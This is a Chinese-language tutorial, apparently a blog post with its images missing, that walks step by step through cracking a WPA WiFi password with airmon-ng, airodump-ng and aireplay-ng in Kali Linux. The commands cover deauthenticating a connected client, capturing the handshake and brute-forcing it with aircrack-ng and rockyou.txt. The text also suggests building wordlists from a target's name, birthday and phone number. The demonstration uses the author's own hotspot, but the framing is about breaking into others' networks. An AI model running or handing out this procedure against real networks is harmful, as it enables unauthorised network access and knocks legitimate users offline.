连接好你的无线网卡
原理
当我们想要破解的WiFi有人在连接着的时候,我们的工具会打断怎么看连没连接好?问得好!
这样就是连接好了
一开始应该是没有连接的,就点一下连接,这一步很重要,点完连接再看看是否和我现在一样输入
airmon-ng
查看网卡信息
可以再输入
ifconfig
查看一下
有这个就说明成功了首先要开启监听模式
airmon-ng start wlan0
然后嗅探WiFi,这里破解别人的不太好,我就用我自己的热点来演示。第一条命令报错用第二条
airodump-ng wlan0mon
airodump-ng wlan0
BSSID代表是WiFi的MAC地址CH代表是信道,信号频道,有关于wlan的知识,我们后面也会利用到ESSID代表WiFi的名字Ctrl+C可以中断嗅探
抓取WiFi数据包
airdump-ng -c 信道 --bssid BSSID号 -w/保存目录 wlan0mon
举个栗子:
airodump-ng -c 6 --bssid 56:C1:0A:63:7C:1B -w/home wlan0mon
如果出错就输入
airodump-ng -c 6 --bssid 56:C1:0A:63:7C:1B -w/home wlan0
如果我们想破解一个WiFi,那么这个WiFi必须是有人在连接状态的,如果抓到包会有一个提示
如果出现这个提示就说明你没有攻击这个WiFi,所以没有拿到握手协议在打开一个终端输入这条命令如果第一条命令报错就输入第二条
aireplay-ng -0 10 -a 56:C1:0A:63:7C:1B -c 4c:02:20:87:F0:5D wlan0mon
aireplay-ng -0 10 -a 56:C1:0A:63:7C:1B -c 4c:02:20:87:F0:5D wlan0
这个命令是这么构建的
如果出现WPA handshake,就说明抓包成功,有握手协议了,抓到后Ctrl+C结束
抓到包后我们就需要用密码进行爆破,所以说前面我写了字典的生成,字典对于爆破很重要,WiFi密码要根据他的习惯来猜,然后生成字典进行爆破,猜的点可以在他的名字,生日,手机号等等根据具体情况来制订,当然kali也给我们准备了一个比较强大的字典,这个字典在/usr/share/wordlists/rockyou.txt
如果不熟悉命令行可以用图形化界面搜索
我们来看一下,这里会有一个rockyou.txt.gz我们解压一下
就会有一个rockyou.txt
破解前最后一步cd ..回到桌面然后ls看一下我们需要的home-02.cap,第一次可能是home-01.cap破解命令
因为这是我的热点所以破解比较快,破解是个时间和字典问题哦aircrack-ng -w /usr/share/wordlists/rockyou.txt home-02.cap